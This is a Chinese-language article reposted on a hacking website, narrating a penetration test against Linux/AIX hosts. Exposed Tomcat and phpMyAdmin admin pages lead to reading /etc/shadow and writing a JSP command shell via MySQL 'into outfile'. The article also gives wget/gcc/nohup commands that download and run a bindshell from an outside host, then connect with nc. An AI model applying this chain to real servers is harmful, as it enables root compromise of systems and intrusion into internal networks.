奥运倒计时:
设为首页
加入收藏
论坛登陆 用户名:
密码:
首页
新闻资讯
文章中心
黑客资源
黑客点睛
安全防护
软件下载
动画教程
商城中心
技术问答
论坛社区
文章
下载
图片
点睛
您现在的位置:
太平洋安全网
>>
黑客点晴
>>
入侵渗透
>> 正文
[图文]
一次渗透三台Unix主机中系统测试的过程
作者:佚名 黑客点晴来源:
网络转载
点击数: 更新时间:2008-5-10
我们检测的三台主机中两台为Linux系统,一台为AIX
系统
。还有一台是边界路由器。目标
网络
的主机通过地址转换来提供对外访问,内部使用172.16.*.*地址段(这些信息是测试之后才得到的,开始并不知道)。在边界路由器后面还有一台Cisco PIX 525(515?)对三台主机进行保护,
根据我们的检测,Cisco PIX防火墙的过滤规则设置还是比较严密的,基本上没有多余端口允许外部用户访问。在对xx.xx.xx.2和xx.xx.xx.3进行了端口扫描之后,发现只有通过xx.xx.xx.3的WEB服务进行进行间接
攻击
。首先检查TCP/80端口的
服务
,我们发现新闻
搜索
的功能是在另外一个端口8070提供的。直接输入
http://yyy.yyy.yyy:8070/
之后,得到了一个
系统
管理登录页面,简单地测试了一下,输入test/test作为用户名/口令,似乎认证成功,但最后并不能进入下一个页面。我们发现这个端口正在运行Tomcat 3.1,而这个版本存在一个
安全
漏洞
,缺省/admin目录是可以访问的。
在输入
http://yyy.yyy.yyy:8070/admin
之后,我们果然看到了”Tomcat Administration Tools”的页面, 通过点击”Context Admin”这个链接,我们可以对Tomcat的Context进行管理,例如查看、增加、删除Context。这个Context有点类似虚拟目录,于是我们可以增加一个context, 例如”/tt”,将它的文档根目录设置为”/”,这样当我们访
http://yyy.yyy.yyy:8070/tt
时看到的就是系统根目录的列表了!进一步可以查看任意目录里面的任意文件。由于Tomcat是以root身份运行的,所以可以查看任意
系统
文件,例如/etc/passwd
和/etc/shadow。根据口令文件进行密码
破解
后发现
系统
中的两个用户test和root都使用了非常简单的口令:123456。尽管外部用户无法直接访问telnet
服务
,这些口令还是应当被重设为更为强壮的字符串
利用这个
漏洞
我们基本上可以查看整个
系统
,但是由于无法写入
数据
,威胁似乎还不
是很大。 于是我们将注意力转移到
论坛
和聊天室。这两个
服务
一个监听在8080,一个监听在8888
端口。直接输
http://yyy.yyy.yyy:8080/
, 我们看到了Tomcat
4.1.10的欢迎页面,点击左边的管理链接:
http://yyy.yyy.yyy:8080/admin
,我们得到了一个登录页面,虽然
我们不知道口令,但是通过前面8070端口的
漏洞
,我们找到了Tomcat保存这些口令的
文件,得到了管理用户名为admin,口令为空。于是我们就可以对整个Tomcat
服务
器进
行管理了。
但这仍然不足以让我们在
系统
上运行命令。于是我们继续检查聊天室所在的8888端口。
这个端口运行的是apache 1.3.26 +php 4.1.2。开始没有发现什么问题,突然想
到前面发现的两个
漏洞
都与/admin有关,这个端口上会不会也有这个目录呢?在输入
这个目录之后我们惊奇地发现,我们进入了一个phpMyadmin的管理界面。我们可以对
整个
数据
库进行任意操作。由于
数据库
是MySQL,它支持从本地操作
系统
读入或者写入
数据
。因此我们在test库中建立了一个简单的表,然后添加一条记录,记录的内容就
是一个php文件的内容,我们想写入一个php文件,然后利用php调用外部命令的方法
来执行命令。我们利用
select tt into outfile /path/test.php from kk
这样的命令来将
数据库
中的内容写到一个php文件里,但由于mysql是以mysql用户身
份运行的,无法写到apache的目录中。所以这次尝试失败了。
我们又想到了一个方法,利用8070端口的
漏洞
我们可以访问任意
系统
文件,而8070端
口是由tomcat提供
服务
的,如果我们可以设法在
系统
中创建一个.jsp文件,就可以远
程访问这个jsp文件,它将被tomcat处理并运行。如果这个.jsp文件中的内容是一段
执行系统命令代码,就可以运行
系统
命令了。
于是我们又重新编写了一段可以执行
系统
命令的jsp代码,将其输入测试表中,再次利
用into outfile方法将其内容写到/tmp/test.jsp文件中,然后访问下列链接:
http://yyy.yyy.yyy:8070/tt/tmp/test.jsp
我们发现我们指定的命令被执行了!而且是以root身份执行的。这意味着我们已经完全
控制了整个
系统
。
当然,通过cgi执行命令还是不如有一个shell来得方便。当然最简单的方法就是开一个
xterm连回到我们的Xwindows即可。但是我们是用的NAT,连不进来。听说工程部有
个IP是可以外部访问的,就搬了笔记本过去准备用,结果在一切都准备好之后,发现对方
居然关机了!@#^*#%#%#$%
第二天,我决定还是用老办法,开个shell算了。首先要找到一个可以外部访问的端口。
但是防火墙并不允许外部访问所有的端口,经过一番测试,发现所有允许访问的端口都
被占用着。仔细看了看进程,发现chatserver占了4个端口,每一个端口对应一个
聊天室,而且目前也没有人在使用这些聊天室。所以我就先kill掉其中一个进程,这样就
可以将在其对应的端口上绑定一个shell了。
通过jsp执行命令来
下载
/编译/运行我们的bindshell:
wget
http://ourhost/bindshell.c
gcc -o bindshell bindshell.c
nohup ./bindshell
现在就可以连接我们的shell了:
nc yyy.yyy.yyy 9100
现在我们已经在防火墙的后面了,因此可以直接访问内网了。通过扫描发现存在如下内
部主机:
172.16.1.1 Cisco PIX
172.16.1.2 mail
172.16.1.3 web
172.16.1.4 oracle db
进一步测试还可以
入侵
其中的oracle
服务
器。至此,此次渗透测试基本结束。
黑客点晴录入:随风追忆 责任编辑:随风追忆
上一个黑客点晴:
从注入到渗透日本服务器群
下一个黑客点晴:
交换环境下SNIFFER的几种攻击技术手段
【
发表评论
】【
加入收藏
】【
告诉好友
】【
打印此文
】【
关闭窗口
】
推荐
点睛
[易语言二课]如何增加易语言的组件 ,以及组…
[易语言一课]简单了解与实例易语言
10秒钟让你和任意QQ号聊天
菜鸟黑客入门攻击及防范技巧
黑客利器流光使用技巧
PHP实战--入侵郑州广播在线
热门
点睛
[易语言一课]简单了解与实例易语言
10秒钟让你和任意QQ号聊天
菜鸟黑客入门攻击及防范技巧
黑客利器流光使用技巧
PHP实战--入侵郑州广播在线
灰鸽子简单写下载者做搭配
本站
推荐
关于我们
|
联系方法
|
招聘信息
|
加入会员
|
诚征代理
|
广告服务
|
欢迎投稿
|
站长信箱
|
友情链接
|
网站地图
24小时客服:0374-7126138 技术支持:0374-7126138 投诉电话:0374-7967536
客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
许可证号:豫ICP备07005385号